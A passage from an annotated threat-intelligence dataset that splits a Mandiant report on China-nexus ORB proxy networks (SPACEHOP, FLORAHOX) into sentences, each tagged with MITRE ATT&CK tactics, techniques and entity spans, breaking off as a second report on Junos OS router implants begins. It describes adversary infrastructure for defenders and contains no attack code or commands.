preferred procured networks in the past.", "sentence_text": "Alternatively, threat actors with a civilian intelligence background have proven more likely to utilize non-provisioned networks consisting of routers compromised by custom malware.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1090.003", "name": "Multi-hop Proxy" } ], "procedure": "Civilian intelligence threat actors use non-provisioned proxy infrastructure via malware-compromised routers", "entities": [ { "text": "threat actors with a civilian intelligence background", "start": 15, "end": 68, "label": "Infrastructure_Indicator" }, { "text": "non-provisioned networks", "start": 104, "end": 128, "label": "Infrastructure_Indicator" }, { "text": "routers compromised by custom malware", "start": 143, "end": 180, "label": "Infrastructure_Indicator" }, { "text": "to utilize", "start": 93, "end": 103, "label": "Action" } ] }, { "uid": "mitre-94_mitre_report-p1-s36-7a9ff4", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 36, "context_before": "Alternatively, threat actors with a civilian intelligence background have proven more likely to utilize non-provisioned networks consisting of routers compromised by custom malware.", "sentence_text": "Characteristics of provisioned and non-provisioned ORB networks ORB Network Universal Anatomy After continuous analysis of numerous ORB networks spanning years, Mandiant has designed a universal anatomy for analyzing and labeling ORB network components.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s37-9cb356", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 37, "context_before": "Characteristics of provisioned and non-provisioned ORB networks ORB Network Universal Anatomy After continuous analysis of numerous ORB networks spanning years, Mandiant has designed a universal anatomy for analyzing and labeling ORB network components.", "sentence_text": "This anatomy is intended to serve as a guide for enterprise defenders when identifying malicious ORB network node infrastructure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s38-26e248", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 38, "context_before": "This anatomy is intended to serve as a guide for enterprise defenders when identifying malicious ORB network node infrastructure.", "sentence_text": "All networks that are identified will have a universal set of identifiable components.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s39-299dc8", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 39, "context_before": "All networks that are identified will have a universal set of identifiable components.", "sentence_text": "While the configuration of these components may differ between networks and the traversal path through an ORB network may appear different on a case by case basis, the following components are essential for an ORB network to function:\nAdversary Controlled Operations Server (“ACOS”)\n: This is an adversary-controlled server used to administer nodes within an ORB network.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s40-f63876", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 40, "context_before": "While the configuration of these components may differ between networks and the traversal path through an ORB network may appear different on a case by case basis, the following components are essential for an ORB network to function:\nAdversary Controlled Operations Server (“ACOS”)\n: This is an adversary-controlled server used to administer nodes within an ORB network.", "sentence_text": "Relay Node:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s41-6e8170", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 41, "context_before": "Relay Node:", "sentence_text": "This is most commonly a leased VPS node at a major China or Hong Kong-based cloud provider.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s42-46d28a", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 42, "context_before": "This is most commonly a leased VPS node at a major China or Hong Kong-based cloud provider.", "sentence_text": "This node allows users of an ORB network to authenticate to the network and relay traffic through the larger traversal pool on ORB nodes.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090.003", "name": "Multi-hop Proxy" } ], "procedure": "Authenticates to ORB network and relays traffic through distributed traversal pool", "entities": [ { "text": "ORB network", "start": 29, "end": 40, "label": "Infrastructure_Indicator" }, { "text": "traversal pool on ORB nodes", "start": 109, "end": 136, "label": "Infrastructure_Indicator" }, { "text": "relay traffic ", "start": 76, "end": 90, "label": "Action" } ] }, { "uid": "mitre-94_mitre_report-p1-s43-b2b294", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 43, "context_before": "This node allows users of an ORB network to authenticate to the network and relay traffic through the larger traversal pool on ORB nodes.", "sentence_text": "Traversal Nodes:\nThese are the primary volume of nodes that make up an ORB network.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s44-6f7b1e", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 44, "context_before": "Traversal Nodes:\nThese are the primary volume of nodes that make up an ORB network.", "sentence_text": "These can be either provisioned or non-provisioned nodes and are used to relay traffic across an ORB network obfuscating the origin of network traffic.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090.003", "name": "Multi-hop Proxy" } ], "procedure": "Relay traffic across ORB nodes to hide origin", "entities": [ { "text": "relay traffic", "start": 73, "end": 86, "label": "Action" }, { "text": "obfuscating the origin of network traffic", "start": 109, "end": 150, "label": "Action" }, { "text": "provisioned or non-provisioned nodes", "start": 20, "end": 56, "label": "Infrastructure_Indicator" }, { "text": " ORB network", "start": 96, "end": 108, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-94_mitre_report-p1-s45-5b138d", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 45, "context_before": "These can be either provisioned or non-provisioned nodes and are used to relay traffic across an ORB network obfuscating the origin of network traffic.", "sentence_text": "Some networks may utilize multiple types of traversal nodes or include multiple traversal layers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s46-edfe18", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 46, "context_before": "Some networks may utilize multiple types of traversal nodes or include multiple traversal layers.", "sentence_text": "Exit/Staging Nodes:\nThese are actor-controlled nodes often exhibiting the same characteristics as traversal nodes that are used to egress from an ORB network into a victim environment.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090.003", "name": "Multi-hop Proxy" } ], "procedure": "Egress into victim environment via exit/staging nodes", "entities": [ { "text": "Exit/Staging Nodes", "start": 0, "end": 18, "label": "Infrastructure_Indicator" }, { "text": "actor-controlled nodes ", "start": 30, "end": 53, "label": "Infrastructure_Indicator" }, { "text": "ORB network into a victim environment", "start": 146, "end": 183, "label": "Infrastructure_Indicator" }, { "text": " to egress from an ORB network into a victim environment.", "start": 127, "end": 184, "label": "Action" } ] }, { "uid": "mitre-94_mitre_report-p1-s47-b3835e", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 47, "context_before": "Exit/Staging Nodes:\nThese are actor-controlled nodes often exhibiting the same characteristics as traversal nodes that are used to egress from an ORB network into a victim environment.", "sentence_text": "Victim Server:\nThe targeted victim’s infrastructure communicating with the ORB network node.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s48-d70cd2", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 48, "context_before": "Victim Server:\nThe targeted victim’s infrastructure communicating with the ORB network node.", "sentence_text": "Examples of Active ORB Networks in the Wild ORB3 / SPACEHOP - Provisioned Network A primary example of a provisioned ORB network leveraged in the wild by numerous APTs is a network tracked by Mandiant as ORB3 / SPACEHOP.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s49-8a14ea", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 49, "context_before": "Examples of Active ORB Networks in the Wild ORB3 / SPACEHOP - Provisioned Network A primary example of a provisioned ORB network leveraged in the wild by numerous APTs is a network tracked by Mandiant as ORB3 / SPACEHOP.", "sentence_text": "This network consists of servers provisioned by a single entity operating in China.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s50-24eb18", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 50, "context_before": "This network consists of servers provisioned by a single entity operating in China.", "sentence_text": "The network has facilitated network reconnaissance scanning and vulnerability exploitation conducted by China-nexus threat actors, including APT5 and APT15.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Scanning and exploiting vulnerabilities using ORB network", "entities": [ { "text": "China-nexus threat actors, including APT5 and APT15.", "start": 104, "end": 156, "label": "ThreatActor" }, { "text": "reconnaissance scanning and vulnerability exploitation ", "start": 36, "end": 91, "label": "Action" } ] }, { "uid": "mitre-94_mitre_report-p1-s51-3ebb3a", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 51, "context_before": "The network has facilitated network reconnaissance scanning and vulnerability exploitation conducted by China-nexus threat actors, including APT5 and APT15.", "sentence_text": "Active since at least 2019, UNC2630 (with suspected links to APT5), used a known SPACEHOP node to exploit CVE-2022-27518 in late December 2022.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "UNC2630 used a SPACEHOP ORB node to exploit CVE-2022-27518 for access", "entities": [ { "text": "UNC2630 (with suspected links to APT5)", "start": 28, "end": 66, "label": "ThreatActor" }, { "text": "SPACEHOP node ", "start": 81, "end": 95, "label": "Infrastructure_Indicator" }, { "text": "exploit CVE-2022-27518", "start": 98, "end": 120, "label": "Action" } ] }, { "uid": "mitre-94_mitre_report-p1-s52-3a54d4", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 52, "context_before": "Active since at least 2019, UNC2630 (with suspected links to APT5), used a known SPACEHOP node to exploit CVE-2022-27518 in late December 2022.", "sentence_text": "The National Security Agency (NSA)\nlinked\nexploitation of CVE-2022-27518 within the same time frame to APT5.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploitation of CVE-2022-27518 attributed to APT5", "entities": [ { "text": "exploitation of CVE-2022-27518", "start": 42, "end": 72, "label": "Action" } ] }, { "uid": "mitre-94_mitre_report-p1-s53-6b48e6", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 53, "context_before": "The National Security Agency (NSA)\nlinked\nexploitation of CVE-2022-27518 within the same time frame to APT5.", "sentence_text": "This ORB network’s topography is rather flat when compared to more complex ORB networks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s54-afe2a1", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 54, "context_before": "This ORB network’s topography is rather flat when compared to more complex ORB networks.", "sentence_text": "It leverages a relay server hosted in either Hong Kong or China by cloud providers and installs a C2 framework available on GitHub for the administration of downstream relay nodes.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Using a relay server in China/Hong Kong to install and operate a C2 framework for managing relay nodes", "entities": [ { "text": "leverages a relay server", "start": 3, "end": 27, "label": "Infrastructure_Indicator" }, { "text": "installs a C2 framework", "start": 87, "end": 110, "label": "Infrastructure_Indicator" }, { "text": "installs a C2 framework", "start": 87, "end": 110, "label": "Action" }, { "text": "downstream relay nodes", "start": 157, "end": 179, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-94_mitre_report-p1-s55-7e3f21", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 55, "context_before": "It leverages a relay server hosted in either Hong Kong or China by cloud providers and installs a C2 framework available on GitHub for the administration of downstream relay nodes.", "sentence_text": "The relay nodes are often cloned Linux-based images, which are used to proxy malicious network traffic through the network to an exit node that communicates with targeted victim environments.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090.003", "name": "Multi-hop Proxy" } ], "procedure": "Using cloned relay nodes to proxy malicious traffic through ORB nodes to targeted victim environments", "entities": [ { "text": "relay nodes", "start": 4, "end": 15, "label": "Infrastructure_Indicator" }, { "text": "exit node", "start": 129, "end": 138, "label": "Infrastructure_Indicator" }, { "text": "targeted victim environments", "start": 162, "end": 190, "label": "Infrastructure_Indicator" }, { "text": "proxy malicious network traffic", "start": 71, "end": 102, "label": "Action" } ] }, { "uid": "mitre-94_mitre_report-p1-s56-ae9636", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 56, "context_before": "The relay nodes are often cloned Linux-based images, which are used to proxy malicious network traffic through the network to an exit node that communicates with targeted victim environments.", "sentence_text": "ORB2 FLORAHOX - Non-Provisioned Network FLORAHOX is an example of both a non-provisioned and a hybrid ORB network.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s57-ab320b", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 57, "context_before": "ORB2 FLORAHOX - Non-Provisioned Network FLORAHOX is an example of both a non-provisioned and a hybrid ORB network.", "sentence_text": "It is composed of an ACOS node, compromised network router and IOT devices, and leased VPS servers that interface with a customized TOR relay network layer.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090.003", "name": "Multi-hop Proxy" } ], "procedure": "Using ACOS, compromised routers, IoT devices, and leased VPS to support TOR-based relay C2 communications", "entities": [ { "text": "ACOS node, compromised network router and IOT devices, and leased VPS servers ", "start": 21, "end": 99, "label": "Infrastructure_Indicator" }, { "text": "TOR relay network layer", "start": 132, "end": 155, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-94_mitre_report-p1-s58-19b30e", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 58, "context_before": "It is composed of an ACOS node, compromised network router and IOT devices, and leased VPS servers that interface with a customized TOR relay network layer.", "sentence_text": "The network is used to proxy traffic from a source and relay it through a TOR network and several compromised router nodes to obfuscate the source of the traffic.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090.003", "name": "Multi-hop Proxy" } ], "procedure": "Proxying traffic through TOR and compromised routers to hide the true origin", "entities": [ { "text": "to proxy traffic from a source and relay it", "start": 20, "end": 63, "label": "Action" }, { "text": "to obfuscate the source of the traffic.", "start": 123, "end": 162, "label": "Action" }, { "text": "a TOR network and several compromised router nodes", "start": 72, "end": 122, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-94_mitre_report-p1-s59-ea6c05", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 59, "context_before": "The network is used to proxy traffic from a source and relay it through a TOR network and several compromised router nodes to obfuscate the source of the traffic.", "sentence_text": "It is believed to be used in cyber espionage campaigns by a diverse set of China-nexus threat actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s60-c89997", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 60, "context_before": "It is believed to be used in cyber espionage campaigns by a diverse set of China-nexus threat actors.", "sentence_text": "The network appears to contain several subnetworks composed of compromised devices recruited by the router implant FLOWERWATER as well as other router-based payloads.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Compromised devices recruited by FLOWERWATER and other router payloads to form malicious subnetworks", "entities": [ { "text": " recruited", "start": 82, "end": 92, "label": "Action" }, { "text": "subnetworks composed of compromised devices", "start": 39, "end": 82, "label": "Infrastructure_Indicator" }, { "text": "FLOWERWATER", "start": 115, "end": 126, "label": "MalwareTool" }, { "text": "other router-based payloads", "start": 138, "end": 165, "label": "MalwareTool" } ] }, { "uid": "mitre-94_mitre_report-p1-s61-8ab3b5", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 61, "context_before": "The network appears to contain several subnetworks composed of compromised devices recruited by the router implant FLOWERWATER as well as other router-based payloads.", "sentence_text": "Subnetworks are capable of being used in an overlapping manner to relay malicious traffic through the network segments.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090.003", "name": "Multi-hop Proxy" } ], "procedure": "Using overlapping subnetworks to relay malicious traffic across network segments to obscure origin", "entities": [ { "text": "to relay malicious traffic", "start": 63, "end": 89, "label": "Action" }, { "text": "Subnetworks ", "start": 0, "end": 12, "label": "Infrastructure_Indicator" }, { "text": "network segments", "start": 102, "end": 118, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-94_mitre_report-p1-s62-76b979", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 62, "context_before": "Subnetworks are capable of being used in an overlapping manner to relay malicious traffic through the network segments.", "sentence_text": "FLORAHOX appears to be multi-tenanted with several distinct router compromise payloads being used for the augmentation of the network and several APT threat actors leveraging the network.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Multiple router compromise payloads used to expand FLORAHOX infrastructure for use by multiple APT actors", "entities": [ { "text": "APT threat actors", "start": 146, "end": 163, "label": "ThreatActor" }, { "text": "router compromise payloads", "start": 60, "end": 86, "label": "MalwareTool" }, { "text": "FLORAHOX ", "start": 0, "end": 9, "label": "Infrastructure_Indicator" }, { "text": "the network", "start": 122, "end": 133, "label": "Infrastructure_Indicator" }, { "text": "the augmentation of the network", "start": 102, "end": 133, "label": "Action" }, { "text": "leveraging the network", "start": 164, "end": 186, "label": "Action" } ] }, { "uid": "mitre-94_mitre_report-p1-s63-bb30e4", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 63, "context_before": "FLORAHOX appears to be multi-tenanted with several distinct router compromise payloads being used for the augmentation of the network and several APT threat actors leveraging the network.", "sentence_text": "While it appears several actors may utilize the FLORAHOX network, China-nexus threat actors including clusters of activity publicly tracked as APT31 and Zirconium have been reported by multiple trusted third-party sources to utilize the network.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s64-0a6d9e", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 64, "context_before": "While it appears several actors may utilize the FLORAHOX network, China-nexus threat actors including clusters of activity publicly tracked as APT31 and Zirconium have been reported by multiple trusted third-party sources to utilize the network.", "sentence_text": "The purpose of these tools appears to be providing a configuration for the traversal of the network and traversing the network of pre-existing FLORAHOX nodes based on command-line inputs.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090.003", "name": "Multi-hop Proxy" } ], "procedure": "Tools configure and facilitate traversal of FLORAHOX nodes using command-line instructions", "entities": [ { "text": "configuration for the traversal of the network and traversing the network ", "start": 53, "end": 127, "label": "Infrastructure_Indicator" }, { "text": "pre-existing FLORAHOX nodes", "start": 130, "end": 157, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-94_mitre_report-p1-s65-68d3bf", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 65, "context_before": "The purpose of these tools appears to be providing a configuration for the traversal of the network and traversing the network of pre-existing FLORAHOX nodes based on command-line inputs.", "sentence_text": "ORB2 represents a more complicated design including the relay of traffic through TOR nodes, provisioned VPS servers, and different types of compromised routers including CISCO, ASUS, and Draytek end-of-life devices.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090.003", "name": "Multi-hop Proxy" } ], "procedure": "Relaying malicious traffic through TOR nodes, VPS servers, and compromised routers within the ORB2 structure", "entities": [ { "text": " relay of traffic", "start": 55, "end": 72, "label": "Action" }, { "text": "TOR nodes, provisioned VPS servers", "start": 81, "end": 115, "label": "Infrastructure_Indicator" }, { "text": " compromised routers including CISCO, ASUS, and Draytek end-of-life devices", "start": 139, "end": 214, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-94_mitre_report-p1-s66-7a94cb", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 66, "context_before": "ORB2 represents a more complicated design including the relay of traffic through TOR nodes, provisioned VPS servers, and different types of compromised routers including CISCO, ASUS, and Draytek end-of-life devices.", "sentence_text": "The network embodies years of continual augmentation and several generations of distinct router-based payloads used simultaneously to recruit vulnerable devices into the FLORAHOX traversal node pool.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Router-based payloads recruit vulnerable devices into FLORAHOX traversal infrastructure", "entities": [ { "text": "FLORAHOX traversal node pool", "start": 170, "end": 198, "label": "MalwareTool" }, { "text": "to recruit vulnerable devices", "start": 131, "end": 160, "label": "Action" } ] }, { "uid": "mitre-94_mitre_report-p1-s67-604877", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 67, "context_before": "The network embodies years of continual augmentation and several generations of distinct router-based payloads used simultaneously to recruit vulnerable devices into the FLORAHOX traversal node pool.", "sentence_text": "The Defender’s Dilemma", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s68-cf182c", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 68, "context_before": "The Defender’s Dilemma", "sentence_text": "The widespread adoption of ORB networks by China-nexus espionage actors introduces a new layer of complexity to defending enterprise environments from malicious infrastructure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s69-829cc7", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 69, "context_before": "The widespread adoption of ORB networks by China-nexus espionage actors introduces a new layer of complexity to defending enterprise environments from malicious infrastructure.", "sentence_text": "Rather than earlier practices allowing for the outright blocking of adversary infrastructure, defenders must now consider:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s70-3a8a93", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 70, "context_before": "Rather than earlier practices allowing for the outright blocking of adversary infrastructure, defenders must now consider:", "sentence_text": "Temporality:\nWhat Infrastructure is part of the ORB network right now?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s71-341a2e", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 71, "context_before": "Temporality:\nWhat Infrastructure is part of the ORB network right now?", "sentence_text": "Multiplicity of Adversaries:\nWhich adversaries are using this ORB network and am I seeing one of them targeting my network?\nEphemerality:\nHow long is this infrastructure part of the ORB network being defended against and are changing characteristics of infrastructure indicative of new tactics?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s72-47171b", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 72, "context_before": "Multiplicity of Adversaries:\nWhich adversaries are using this ORB network and am I seeing one of them targeting my network?\nEphemerality:\nHow long is this infrastructure part of the ORB network being defended against and are changing characteristics of infrastructure indicative of new tactics?", "sentence_text": "By shifting awareness and our enterprise defender paradigm toward treating ORB networks like APTs instead of IOCs, defenders can begin to turn their dilemma into a defender’s advantage.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s73-227919", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 73, "context_before": "By shifting awareness and our enterprise defender paradigm toward treating ORB networks like APTs instead of IOCs, defenders can begin to turn their dilemma into a defender’s advantage.", "sentence_text": "Conclusion\nUse of ORB networks to proxy traffic in a compromised network is not a new tactic, nor is it unique to China-nexus cyber espionage actors.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090.003", "name": "Multi-hop Proxy" } ], "procedure": "Use ORB networks to proxy traffic in compromised networks", "entities": [ { "text": "to proxy traffic", "start": 31, "end": 47, "label": "Action" }, { "text": "ORB networks", "start": 18, "end": 30, "label": "Infrastructure_Indicator" }, { "text": "China-nexus cyber espionage actors.", "start": 114, "end": 149, "label": "ThreatActor" } ] }, { "uid": "mitre-94_mitre_report-p1-s74-ebd7e2", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 74, "context_before": "Conclusion\nUse of ORB networks to proxy traffic in a compromised network is not a new tactic, nor is it unique to China-nexus cyber espionage actors.", "sentence_text": "However, its ubiquity that has evolved over the past four years now requires defenders to meet this challenge head on to keep pace with adversaries in the cyber espionage landscape.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s75-59a79f", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 75, "context_before": "However, its ubiquity that has evolved over the past four years now requires defenders to meet this challenge head on to keep pace with adversaries in the cyber espionage landscape.", "sentence_text": "In addition to wanting to be stealthy, actors want to increase the cost and analytical burden on defenders of enterprise environments.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s76-def016", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 76, "context_before": "In addition to wanting to be stealthy, actors want to increase the cost and analytical burden on defenders of enterprise environments.", "sentence_text": "The rise of the ORB network industry in China points to long-term investments in equipping China-nexus cyber operators with more sophisticated tactics and tools that facilitate enterprise exploitation to achieve higher success rates in gaining and maintaining access to high-value networks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s77-b43d61", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 77, "context_before": "The rise of the ORB network industry in China points to long-term investments in equipping China-nexus cyber operators with more sophisticated tactics and tools that facilitate enterprise exploitation to achieve higher success rates in gaining and maintaining access to high-value networks.", "sentence_text": "Whether defenders will rise to this challenge depends on enterprises applying the same deep tactical focus to tracking ORB networks as has been done for APTs over the last 15 years.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s78-94931d", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 78, "context_before": "Whether defenders will rise to this challenge depends on enterprises applying the same deep tactical focus to tracking ORB networks as has been done for APTs over the last 15 years.", "sentence_text": "Posted in\nThreat Intelligence\nRelated articles\nThreat Intelligence\nGTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools By Google Threat Intelligence Group • 30-minute read Threat Intelligence Preparing for Threats to Come: Cybersecurity Forecast 2026 By Adam Greenberg • 4-minute read Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-94_mitre_report-p1-s79-b40731", "source": "mitre", "doc_id": "94_mitre_report", "page_number": 1, "sentence_id": 79, "context_before": "Posted in\nThreat Intelligence\nRelated articles\nThreat Intelligence\nGTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools By Google Threat Intelligence Group • 30-minute read Threat Intelligence Preparing for Threats to Come: Cybersecurity Forecast 2026 By Adam Greenberg • 4-minute read Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "sentence_text": "Posting Campaigns to Deliver Malware and Steal Credentials By Google Threat Intelligence Group • 6-minute read [FILTERED_TABLES_START]\nLeased VPS devices via commercial services | Compromised routers and IoT devices [FILTERED_TABLES_END]", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1583.003", "name": "Virtual Private Server" } ], "procedure": "Adversaries use leased VPS services and compromised routers/IoT devices as infrastructure.", "entities": [ { "text": "Leased VPS devices via commercial services", "start": 135, "end": 177, "label": "Infrastructure_Indicator" }, { "text": "Compromised routers and IoT devices", "start": 180, "end": 215, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p1-s1-d52996", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "The team launched a project – codenamed RedPenguin – with the following goals: 1) confirm that the routers were impacted by malicious software implants; 2) understand the malware designs and implementations; 3) assess how the malware was able to run on Junos OS routers, which are protected with the veriexec runtime integrity subsystem; 4) formulate recommendations to minimize the malware risk.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p1-s2-36f734", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 1, "sentence_id": 2, "context_before": "The team launched a project – codenamed RedPenguin – with the following goals: 1) confirm that the routers were impacted by malicious software implants; 2) understand the malware designs and implementations; 3) assess how the malware was able to run on Junos OS routers, which are protected with the veriexec runtime integrity subsystem; 4) formulate recommendations to minimize the malware risk.", "sentence_text": "The team determined that the set of six implants are indeed malicious software designed to remotely take over Junos OS devices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p1-s3-b3838f", "source": 